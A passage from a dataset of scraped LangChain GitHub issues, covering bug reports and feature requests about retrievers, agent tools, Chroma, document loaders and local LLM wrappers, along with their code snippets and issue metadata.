"langchain"
]
 | Environment: DATABRICKS_RUNTIME_VERSION: 10.4
Python 3.8.10
Langchain 0.0.172
I was following along with the basic tutorial here: [Self-querying retriever with Chroma](https://python.langchain.com/en/latest/modules/indexes/retrievers/examples/chroma_self_query_retriever.html) and I keep getting a **TypeError: 'NoneType' object is not callable** error. Also, when I call `.get()` on the vectorstore, the embeddings field is "None". Is this related to the error? Any idea what I'm doing wrong here? Many thanks.

**---------------------------------------------------------------------------------------------------------------------------------------------**
**My full code:**
```python
from langchain.docstore.document import Document
from langchain.embeddings import OpenAIEmbeddings
from langchain.vectorstores import Chroma

docs = [
    Document(page_content="A bunch of scientists bring back dinosaurs and mayhem breaks loose", metadata={"year": 1993, "rating": 7.7, "genre": "action"}),
    Document(page_content="Leo DiCaprio gets lost in a dream within a dream within a dream within a ...", metadata={"year": 2010, "director": "Christopher Nolan", "rating": 8.2}),
    Document(page_content="A psychologist / detective gets lost in a series of dreams within dreams within dreams and Inception reused the idea", metadata={"year": 2006, "director": "Satoshi Kon", "rating": 8.6}),
    Document(page_content="A bunch of normal-sized women are supremely wholesome and some men pine after them", metadata={"year": 2019, "director": "Greta Gerwig", "rating": 8.3}),
    Document(page_content="Toys come alive and have a blast doing so", metadata={"year": 1995, "genre": "animated"}),
    Document(page_content="Three men walk into the Zone, three men walk out of the Zone", metadata={"year": 1979, "rating": 9.9, "director": "Andrei Tarkovsky", "genre": "science fiction"})
]

embeddings = OpenAIEmbeddings(chunk_size=1)
vectorstore = Chroma.from_documents(docs, embeddings)

from langchain.llms import OpenAI
from langchain.retrievers.self_query.base import SelfQueryRetriever
from langchain.chains.query_constructor.base import AttributeInfo

metadata_field_info = [
    AttributeInfo(
        name="genre",
        description="The genre of the movie",
        type="string or list[string]",
    ),
    AttributeInfo(
        name="year",
        description="The year the movie was released",
        type="integer",
    ),
    AttributeInfo(
        name="director",
        description="The name of the movie director",
        type="string",
    ),
    AttributeInfo(
        name="rating",
        description="A 1-10 rating for the movie",
        type="float"
    ),
]
document_content_description = "Brief summary of a movie"
llm = OpenAI(temperature=0)
retriever = SelfQueryRetriever.from_llm(llm, vectorstore, document_content_description, metadata_field_info, verbose=True)
```
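My current suspicion: `QueryTransformer` in `langchain/chains/query_constructor/parser.py` is defined behind an optional `lark` import, so if `lark` is not installed the class object ends up as `None` and calling it raises exactly this TypeError. A quick check (assuming nothing beyond the `lark` package itself):
```python
# If this import fails, `pip install lark` is likely the missing piece
import lark
print(lark.__version__)
```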
**---------------------------------------------------------------------------------------------------------------------------------------------**
**TypeError Traceback (most recent call last)**
<command-1036279072864042> in <module>
27 document_content_description = "Brief summary of a movie"
28 llm = OpenAI(temperature=0)
---> 29 retriever = SelfQueryRetriever.from_llm(llm, vectorstore, document_content_description, metadata_field_info, verbose=True)
/databricks/python/lib/python3.8/site-packages/langchain/retrievers/self_query/base.py in from_llm(cls, llm, vectorstore, document_contents, metadata_field_info, structured_query_translator, chain_kwargs, enable_limit, **kwargs)
112 "allowed_operators"
113 ] = structured_query_translator.allowed_operators
--> 114 llm_chain = load_query_constructor_chain(
115 llm,
116 document_contents,
/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in load_query_constructor_chain(llm, document_contents, attribute_info, examples, allowed_comparators, allowed_operators, enable_limit, **kwargs)
123 **kwargs: Any,
124 ) -> LLMChain:
--> 125 prompt = _get_prompt(
126 document_contents,
127 attribute_info,
/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in _get_prompt(document_contents, attribute_info, examples, allowed_comparators, allowed_operators, enable_limit)
100 i=len(examples) + 1, content=document_contents, attributes=attribute_str
101 )
--> 102 output_parser = StructuredQueryOutputParser.from_components(
103 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators
104 )
/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in from_components(cls, allowed_comparators, allowed_operators)
57 allowed_operators: Optional[Sequence[Operator]] = None,
58 ) -> StructuredQueryOutputParser:
---> 59 ast_parser = get_parser(
60 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators
61 )
/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/parser.py in get_parser(allowed_comparators, allowed_operators)
127 allowed_operators: Optional[Sequence[Operator]] = None,
128 ) -> Lark:
--> 129 transformer = QueryTransformer(
130 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators
131 )
| TypeError when using SelfQueryRetriever | https://api.github.com/repos/langchain-ai/langchain/issues/4887/comments | 8 | 2023-05-17T22:42:25Z | 2023-09-22T16:08:59Z | https://github.com/langchain-ai/langchain/issues/4887 | 1,714,743,745 | 4,887 |
[
"hwchase17",
"langchain"
]
| ### System Info
macos
langchain 0.0.172
### Who can help?
@vowelparrot
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Used `tool = AIPluginTool.from_plugin_url("http://localhost:4242/ai-plugin.json")` with a local plugin, which nicely produced a POST API request as a tool.
2. When executing a POST, the message was:
`Thought:I need to use the MomoTodo API to create reminders for each meal tomorrow.
Action: requests_post
Action Input: json string {"url": "http://localhost:4242/momotodos", "data": {"title": "Reminder: Breakfast", "completed": false}}`
3. The action input is parsed in
https://github.com/hwchase17/langchain/blob/master/langchain/tools/requests/tool.py#L70
https://github.com/hwchase17/langchain/blob/master/langchain/tools/requests/tool.py#L18
So, due to the prefix "json string", there is a failure:
Observation: JSONDecodeError('Expecting value: line 1 column 1 (char 0)')
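A tolerant-parsing sketch (the `parse_post_input` helper is my own, not the library's) that extracts the first JSON object from the action string:
```python
import json
import re

def parse_post_input(text: str) -> dict:
    """Extract the first JSON object embedded in the model's action
    input, tolerating prefixes such as 'json string' before the brace."""
    match = re.search(r"\{.*\}", text, re.DOTALL)
    if match is None:
        raise ValueError(f"No JSON object found in: {text!r}")
    return json.loads(match.group(0))
```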
### Expected behavior
The POST request's action string should always be JSON, but we can't expect the model to always emit clean JSON.
The input should be cleaned up and parsed properly. | RequestsPostTool parsing of the input text is naive and tend to fail since JSON has prefixes sometimes. | https://api.github.com/repos/langchain-ai/langchain/issues/4886/comments | 1 | 2023-05-17T22:18:43Z | 2023-09-10T16:16:03Z | https://github.com/langchain-ai/langchain/issues/4886 | 1,714,726,354 | 4,886 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi there, the load_tools function implemented in https://python.langchain.com/en/latest/_modules/langchain/agents/load_tools.html won't accept custom tools. I'm trying to enrich agent debates with tools, as discussed here https://python.langchain.com/en/latest/use_cases/agent_simulations/two_agent_debate_tools.html, with a new prompt-based tool:
```python
from langchain.agents import tool

@tool("optimistic_string")
def optimistic_string(input_string: str) -> str:
    """Rewrites the input string with a more optimistic tone."""
    # Build the rewrite instruction around the incoming string
    prompt = f"Rewrite the following sentence with a more optimistic tone: {input_string}"
    output_string = llm(prompt)  # Replace this with the actual call to the language model
    return output_string
```
But it's not possible at the moment, as an error is raised in load_tools for unrecognized tools. How do we add custom tools to the simulation? Can anyone provide guidance? It is paramount to be able to customize tools to fully take advantage of agent-based simulation. Thanks! :)
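For what it's worth, a sketch of the pattern I expected to work (assuming `llm` and the decorated tool from above): `load_tools` only resolves built-in tool names, so custom tools would have to be appended to its result before building the agent:
```python
from langchain.agents import initialize_agent, load_tools

# load_tools only resolves built-in tool names; custom tools can be
# appended to the returned list before building the agent.
tools = load_tools(["llm-math"], llm=llm) + [optimistic_string]
agent = initialize_agent(tools, llm, agent="zero-shot-react-description", verbose=True)
```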
### Suggestion:
_No response_ | ValueError(f"Got unknown tool {name}") hardcoded for custom tools in load_tools.py | https://api.github.com/repos/langchain-ai/langchain/issues/4884/comments | 8 | 2023-05-17T22:06:33Z | 2023-05-20T16:32:10Z | https://github.com/langchain-ai/langchain/issues/4884 | 1,714,715,520 | 4,884 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to delete a single document from Chroma db using the following code:
```python
chroma_db = Chroma(
    persist_directory=embeddings_save_path,
    embedding_function=OpenAIEmbeddings(
        model=os.getenv("EMBEDDING_MODEL_NAME"),
        chunk_size=1,
        max_retries=5,
    ),
)
chroma_db._collection.delete(ids=list_of_ids)
chroma_db.persist()
```
However, the document is not actually being deleted; after re-loading the Chroma db from local, it still shows the document.
I have tried the following things to fix the issue:
- made sure that the list of ids is correct
- deleted the document multiple times
- restarted the Chroma db server

None of these things have worked.
I am not sure why the document is not being deleted. I would appreciate any help in resolving this issue.
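In case it's useful, this is how I'm checking whether the ids are really gone, via the underlying `chromadb` collection API:
```python
# A non-empty "ids" list here means the delete did not take effect
remaining = chroma_db._collection.get(ids=list_of_ids)
print(remaining["ids"])
print(chroma_db._collection.count())  # total embeddings still stored
```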
Thanks,
Anant Patankar
### Suggestion:
_No response_ | Issue: Chromadb document deletion not working | https://api.github.com/repos/langchain-ai/langchain/issues/4880/comments | 18 | 2023-05-17T20:16:45Z | 2024-08-10T13:28:34Z | https://github.com/langchain-ai/langchain/issues/4880 | 1,714,599,007 | 4,880 |
[
"hwchase17",
"langchain"
]
| ### Feature request
It would be helpful if we could define which file types we want to load via the [Google Drive loader](https://python.langchain.com/en/latest/modules/indexes/document_loaders/examples/google_drive.html#), e.g. only docs, sheets, or PDFs.
### Motivation
The current loader loads 3 file types (doc, sheet, and pdf), but in my project I only want to load "application/vnd.google-apps.document".
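A sketch of the kind of API I have in mind (the `file_types` argument is the proposed addition and does not exist today; the folder id is a placeholder):
```python
from langchain.document_loaders import GoogleDriveLoader

loader = GoogleDriveLoader(
    folder_id="<your-folder-id>",
    file_types=["application/vnd.google-apps.document"],  # proposed parameter
)
docs = loader.load()
```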
### Your contribution
I'm happy to contribute with a PR. | Add the possibility to define what file types you want to load from a Google Drive | https://api.github.com/repos/langchain-ai/langchain/issues/4878/comments | 1 | 2023-05-17T19:46:54Z | 2023-09-10T16:16:08Z | https://github.com/langchain-ai/langchain/issues/4878 | 1,714,556,155 | 4,878 |
[
"hwchase17",
"langchain"
]
| ### System Info
I am trying to implement versioning of chains with prompt and llm config files separated from the chain.json file. When trying to call load_chain from langchain.chains with a chat-based LLM in the llm.json config, it yields:
```
c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:169: UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI`
  warnings.warn(
c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:696: UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI`
  warnings.warn(
```
I am not sure how to handle the issue, as I thought load_chain could initialize any chain from a config. Is there a different function I should use to de-serialize chat-based chains?
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
**chain.json**
```json
{
    "memory": null,
    "verbose": false,
    "prompt_path": "C:/Users/KellerBrown/Projects/llm_pipeline/function_configs/document_filter/0.0/prompt.json",
    "llm_path": "C:/Users/KellerBrown/Projects/llm_pipeline/function_configs/document_filter/0.0/llm.json",
    "output_key": "text",
    "_type": "llm_chain"
}
```
**llm.json**
```json
{
    "model_name": "gpt-4",
    "temperature": 0.0,
    "max_tokens": 256,
    "top_p": 1,
    "frequency_penalty": 0,
    "presence_penalty": 0,
    "_type": "openai"
}
```
**prompt.json**
```json
{
    "input_variables": [
        "topic",
        "content"
    ],
    "output_parser": null,
    "template": "Answer 'Yes' or 'No' only. Does the following text contain language pertaining to {topic}? {content}",
    "template_format": "f-string",
    "_type": "prompt"
}
```
**Initializing chain from chain.json with path references to llm and prompt configs**
`chain = load_chain('function_configs/document_filter/0.0/chain.json')`
**Console Output**
[c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:169](file:///C:/Users/KellerBrown/.virtualenvs/llm_pipeline-pYWy7I0v/lib/site-packages/langchain/llms/openai.py:169): UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI`
warnings.warn(
[c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:696](file:///C:/Users/KellerBrown/.virtualenvs/llm_pipeline-pYWy7I0v/lib/site-packages/langchain/llms/openai.py:696): UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI`
warnings.warn(
### Expected behavior
No user warning. | load_chain giving UserWarning when llm.json configured for chat model | https://api.github.com/repos/langchain-ai/langchain/issues/4872/comments | 1 | 2023-05-17T18:07:04Z | 2023-09-10T16:16:13Z | https://github.com/langchain-ai/langchain/issues/4872 | 1,714,400,903 | 4,872 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
One thing I constantly find myself doing is trying to dig up the prompts that are default for various agent notebook tutorials in the docs. If there was a link to the default prompts corresponding to each agent's mention, I wouldn't have to dig them up to find them, and the learning process for agents would be a lot smoother
### Idea or request for content:
Add links to the library's default prompts to notebooks that reference agents | DOC: Incorporate links to the underlying prompts in example docs | https://api.github.com/repos/langchain-ai/langchain/issues/4871/comments | 1 | 2023-05-17T18:04:53Z | 2023-09-10T16:16:18Z | https://github.com/langchain-ai/langchain/issues/4871 | 1,714,397,028 | 4,871 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain 0.0.171, Python 3.9.0, OS Ubuntu 20.04.6 LTS
Hi @hwchase17 @agola11
Using the dolly-v2-7b model with LangChain, I am [running into this issue](https://github.com/databrickslabs/dolly/issues/174). My question is how to chain the input properly so that the chunk from the first chain is fed into the next one, assuming that's the right way to avoid repeating the whole generation; previously, with dolly-v2-3b, it resulted in repeating the same generation 3-4 times.
I am using the following code to generate sample NDAs after feeding it a FAISS vector store whose embeddings were generated with [InstructorEmbedding](https://instructor-embedding.github.io/) (not OpenAI) using [instructor-xl](https://huggingface.co/hkunlp/instructor-xl), but I am getting this error: `The size of tensor a (2048) must match the size of tensor b (2049) at non-singleton dimension 3`.
```
prompt_template = """Use the context below to write a detailed 5000 words NDA between the two persons:
Context: {context}
Topic: {topic}
Disclosing Party: {disclosingparty}
Receiving Party: {receivingparty}
NDA:"""
PROMPT = PromptTemplate(
template=prompt_template, input_variables=["context", "topic", "disclosingparty", "receivingparty"]
)
llm = HuggingFacePipeline.from_model_id(model_id="dolly-v2-7b",
task="text-generation", model_kwargs={"temperature":0, "max_length":5000})
chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_1")
prompt_template = """Using the NDA generated above within the same context as before, continue writing the nda:
Context: {nda_1}
NDA:"""
PROMPT = PromptTemplate(
template=prompt_template, input_variables=["nda_1"]
)
continue_chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_2")
overall_chain = SequentialChain(chains=[chain, continue_chain],
input_variables=['context', 'topic', 'disclosingparty', 'receivingparty'],
output_variables=["nda_1", "nda_2"], verbose=True)
def generate_text(topic, disclosingparty, receivingparty):
docs = db_instructEmbedd.similarity_search(topic, k=4)
inputs = [{"context": doc.page_content, "topic": topic, "disclosingparty": disclosingparty, "receivingparty" : receivingparty} for doc in docs]
return overall_chain.apply(inputs)
response = generate_text("Based on this acquired knowledge, write a detailed NDA in 5000 words or less between these two parties on date May 15, 2023 governing rules of <country>, dont be repetitive and include all the required clauses to make it comprehensive contract", "Mr. X", "Mr. Y")
print(response)
```
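My current hypothesis (not confirmed): dolly-v2 is Pythia-based with a 2048-token context window, so `max_length=5000` asks for positions beyond what the model supports, which would line up with the `(2048)` vs `(2049)` tensor sizes. A bounded sketch of the model setup:
```python
# Keep prompt + generation within the model's 2048-token context window
llm = HuggingFacePipeline.from_model_id(
    model_id="dolly-v2-7b",
    task="text-generation",
    model_kwargs={"temperature": 0, "max_length": 2048},
)
```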
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Running instructor-xl to generate embeddings and using SequentialChain to generate text
### Expected behavior
It should generate a long form text | Using Dolly-v2-7b with langchain getting error: The size of tensor a (2048) must match the size of tensor b (2049) at non-singleton dimension 3 | https://api.github.com/repos/langchain-ai/langchain/issues/4866/comments | 1 | 2023-05-17T16:27:08Z | 2023-09-10T16:16:23Z | https://github.com/langchain-ai/langchain/issues/4866 | 1,714,260,769 | 4,866 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am using custom tools. I used the zero-shot-react-description agent and it was not giving the final answer; it stopped after using the first tool.
So, I created a custom agent with custom examples in the prompt. It is still behaving the same way.
This is the output of the agent executor for one of the examples:
statement = 'a query to get the average outcome variable score of all the CSAT responses'
agent_executor.run(statement)
Output:
> Entering new AgentExecutor chain...
Thought : I need to paraphrase the statement to add more context.
Action : StatementFormattingTool[a query to get the average outcome variable score of all the CSAT responses]
Observation : Get the average outcome variable score for all CSAT responses from the kda_distribution_log_02c581c9912a4ca1af7a67cd46324cf1_llm_test table.
It has to use SQLGenerationTool next to get the query, but it stopped after using the first tool. It happens every time with other statements as well.
### Suggestion:
_No response_ | Langchain agent is not continuing the entire flow of execution | https://api.github.com/repos/langchain-ai/langchain/issues/4865/comments | 7 | 2023-05-17T16:12:55Z | 2024-07-15T07:20:59Z | https://github.com/langchain-ai/langchain/issues/4865 | 1,714,241,439 | 4,865 |
[
"hwchase17",
"langchain"
]
| ### code
```python
from langchain.agents import initialize_agent, load_tools

# llm and serpapi_api_key are assumed to be defined elsewhere
tool_ = load_tools(["serpapi"], serpapi_api_key=serpapi_api_key)
agent = initialize_agent(tool_, llm, agent="zero-shot-react-description", verbose=True, return_intermediate_steps=True)
response = agent({"input": "45*456=?"})
```
### log
> Entering new AgentExecutor chain...
I need to calculate this
Action: Search
Action Input: 45*456
Observation: A. A person who is in a position of trust and confidence to a vulnerable adult shall use the vulnerable adult's assets solely for the benefit of the vulnerable ...
Thought: This isn't what I'm looking for
Action: Search
Action Input: 45*456 math
Observation: The GCF of 45 and 456 is 3. Steps to find GCF. Find the prime factorization of 45 45 = 3 × 3 × 5; Find the prime factorization of 456
Thought: I can use this to calculate the answer
Action: Calculate
Action Input: 45*456/3
Observation: Calculate is not a valid tool, try another one.
.......
> Finished chain.
text-davinci-003 failed to adhere to the prompt "Action: the action to take, should be one of [Search]." Therefore, we need to modify the prompt based on the LLM (Language Model) that we are utilizing.
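One mitigation sketch (using only built-in tool names; `llm` and `serpapi_api_key` as above): register a real calculator via "llm-math" so arithmetic no longer tempts the model into inventing a nonexistent "Calculate" tool.
```python
from langchain.agents import initialize_agent, load_tools

# "llm-math" adds a Calculator tool alongside Search
tools = load_tools(["serpapi", "llm-math"], llm=llm, serpapi_api_key=serpapi_api_key)
agent = initialize_agent(tools, llm, agent="zero-shot-react-description", verbose=True)
print(agent.run("45*456=?"))
```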
### Suggestion:
_No response_ | Issue: The agent with the text-davinci-003 model and serpapi tool attempted to utilize a non-existent tool | https://api.github.com/repos/langchain-ai/langchain/issues/4863/comments | 3 | 2023-05-17T15:32:21Z | 2023-05-22T07:25:47Z | https://github.com/langchain-ai/langchain/issues/4863 | 1,714,170,658 | 4,863 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain v0.0.171
Mac OS
### Who can help?
@jeffchuber
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
If I initialise a Chroma database and then a retriever
```
db = Chroma.from_documents(texts, embeddings_function(),
metadatas=[{"source": str(i)} for i in range(len(texts))], persist_directory=PERSIST_DIRECTORY)
querybase = db.as_retriever(search_type="mmr", search_kwargs={"k":3, "lambda_mult":1})
```
retrieved files are then identical whether I pass 0.1 or 0.9 as the `lambda_mult` parameter.
### Expected behavior
I expect different files.
Digging into the code, there is a typo, I think, in `langchain.vectorstores.chroma`:
the last line should pass `lambda_mult` and not `lambda_mul`.
As this is my first time, I am not sure how to properly suggest or test a fix :)
```
def max_marginal_relevance_search(
self,
query: str,
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[Dict[str, str]] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
fetch_k: Number of Documents to fetch to pass to MMR algorithm.
lambda_mult: Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
filter (Optional[Dict[str, str]]): Filter by metadata. Defaults to None.
Returns:
List of Documents selected by maximal marginal relevance.
"""
if self._embedding_function is None:
raise ValueError(
"For MMR search, you must specify an embedding function on" "creation."
)
embedding = self._embedding_function.embed_query(query)
docs = self.max_marginal_relevance_search_by_vector(
embedding, k, fetch_k, lambda_mul=lambda_mult, filter=filter
)
return docs
```
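If I read it right, the fix is a one-character rename in the call at the bottom of that method:
```python
docs = self.max_marginal_relevance_search_by_vector(
    embedding, k, fetch_k, lambda_mult=lambda_mult, filter=filter
)
```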
| MMR Search in Chroma not working, typo suspected | https://api.github.com/repos/langchain-ai/langchain/issues/4861/comments | 3 | 2023-05-17T14:41:48Z | 2023-06-11T22:33:33Z | https://github.com/langchain-ai/langchain/issues/4861 | 1,714,064,997 | 4,861 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to create a FAISS index with xml files that I have downloaded. However, there doesn't seem to be a loader available for this. Are there any workarounds, or plans to add in a loader for xml files that can't be loaded with MWDumpLoader?
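A workaround sketch I'm considering in the meantime (plain `xml.etree.ElementTree` plus LangChain's `Document`; the file path is a placeholder):
```python
import xml.etree.ElementTree as ET
from langchain.docstore.document import Document

tree = ET.parse("data/example.xml")  # placeholder path
root = tree.getroot()

# Flatten all text nodes into a single Document; adjust to the schema
text = " ".join(chunk.strip() for chunk in root.itertext() if chunk.strip())
docs = [Document(page_content=text, metadata={"source": "data/example.xml"})]
```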
### Suggestion:
Highlight a workaround for loading xml files in the documentation or add a document loader for them | Issue: Unable to load xml files | https://api.github.com/repos/langchain-ai/langchain/issues/4859/comments | 4 | 2023-05-17T14:05:54Z | 2024-01-10T13:56:44Z | https://github.com/langchain-ai/langchain/issues/4859 | 1,713,995,413 | 4,859 |
[
"hwchase17",
"langchain"
]
| ### System Info
I'm trying to load multiple .docx files, but they are not loading. Below is the code:
```
from langchain.document_loaders import DirectoryLoader, UnstructuredWordDocumentLoader

txt_loader = DirectoryLoader(folder_path, glob="./*.docx", loader_cls=UnstructuredWordDocumentLoader)
txt_documents = txt_loader.load()
```
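One variant I should also try: the recursive glob pattern used in the docs, in case the `./` prefix is the problem:
```python
from langchain.document_loaders import DirectoryLoader, UnstructuredWordDocumentLoader

# "**/*.docx" matches .docx files in the folder and in any subfolder
txt_loader = DirectoryLoader(folder_path, glob="**/*.docx", loader_cls=UnstructuredWordDocumentLoader)
txt_documents = txt_loader.load()
```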
I have tried the code below too:
```
import os
from langchain.document_loaders import UnstructuredWordDocumentLoader

def get_documents(file_paths):
    documents = []
    for path in file_paths:
        # Check the real extension instead of the raw directory listing
        if os.path.splitext(path)[1].lower() in ('.docx', '.doc'):
            docx_loader = UnstructuredWordDocumentLoader(path, mode="elements")
            documents += docx_loader.load()
    return documents

file_paths = [
    'Documents/Letter of Invitation.docx',
    'Documents/Data Scientist Questionnaire.docx'
]
```
It is not working either.
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
-
### Expected behavior
not loading multiple files (docx) | Unable to load multiple word docx | https://api.github.com/repos/langchain-ai/langchain/issues/4856/comments | 3 | 2023-05-17T12:57:21Z | 2023-05-18T10:01:03Z | https://github.com/langchain-ai/langchain/issues/4856 | 1,713,851,650 | 4,856 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: master
OS: Debian GNU/Linux 11 (bullseye)
python: 3.11.3
### Who can help?
@hwchase17 @agola11
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
See this [notebook](https://gist.github.com/hsm207/69b3c24b231375b74e8a5ab6f57ffe58)
### Expected behavior
Same behavior as when OpenAI or LlamaCPP is used | GPT4ALL segfaults when using RetrievalQA | https://api.github.com/repos/langchain-ai/langchain/issues/4855/comments | 3 | 2023-05-17T12:36:49Z | 2023-09-12T16:14:55Z | https://github.com/langchain-ai/langchain/issues/4855 | 1,713,813,644 | 4,855 |
[
"hwchase17",
"langchain"
]
|
[SUPPORTED_LOCATIONS](https://github.com/hwchase17/langchain/blob/720ac49f4237e8c177ac65a27903da6215fe91c8/langchain/tools/openapi/utils/api_models.py#L46) does not list APIPropertyLocation.HEADER as supported. However, the comments under APIPropertyLocation next to [COOKIE](https://github.com/hwchase17/langchain/blame/720ac49f4237e8c177ac65a27903da6215fe91c8/langchain/tools/openapi/utils/api_models.py#L28) seem to indicate that HEADER is supported, as it explicitly states that Cookie is not supported. Any clarifications on this? | Is APIPropertyLocation.HEADER supported? | https://api.github.com/repos/langchain-ai/langchain/issues/4854/comments | 3 | 2023-05-17T12:26:39Z | 2024-05-21T01:46:21Z | https://github.com/langchain-ai/langchain/issues/4854 | 1,713,795,337 | 4,854 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
Hi,
I need to get just the generated SQL query for a natural language input.
I don't want to get the results/output of the query from the db. How do I do that?
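A sketch of one option I've seen (relies on `return_intermediate_steps`; the exact shape of the steps may vary by version, and the database URI is a placeholder):
```python
from langchain import OpenAI, SQLDatabase, SQLDatabaseChain

db = SQLDatabase.from_uri("sqlite:///example.db")  # placeholder URI
chain = SQLDatabaseChain(llm=OpenAI(temperature=0), database=db,
                         return_intermediate_steps=True)
result = chain("How many employees are there?")
# The generated SQL shows up among the intermediate steps
print(result["intermediate_steps"])
```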
Thanks!
### Idea or request for content:
_No response_ | DOC: Get only the sql query not the output of the query in SQLDatabaseChain | https://api.github.com/repos/langchain-ai/langchain/issues/4853/comments | 17 | 2023-05-17T12:26:11Z | 2024-06-29T15:25:41Z | https://github.com/langchain-ai/langchain/issues/4853 | 1,713,794,430 | 4,853 |
[
"hwchase17",
"langchain"
]
| ### System Info
version 0.0.171
`llamacpp.py` doesn't accept the parameter `n_gpu_layers`,
whereas the underlying llama-cpp-python code has it.
### Who can help?
@hw
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Just try giving the parameter:
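For example (sketch; the model path is a placeholder):
```python
from langchain.llms import LlamaCpp

# Fails on 0.0.171 because the LlamaCpp wrapper does not expose n_gpu_layers yet
llm = LlamaCpp(model_path="models/ggml-model.bin", n_gpu_layers=32)
```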
### Expected behavior
it should accept the parameter for gpu | llamacpp.py doesn't accepts n_gpu_layer | https://api.github.com/repos/langchain-ai/langchain/issues/4852/comments | 1 | 2023-05-17T11:51:09Z | 2023-09-10T16:16:38Z | https://github.com/langchain-ai/langchain/issues/4852 | 1,713,731,745 | 4,852 |
[
"hwchase17",
"langchain"
]
| ### System Info
LangChain version:0.0.171
windows 10
### Who can help?
_No response_
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
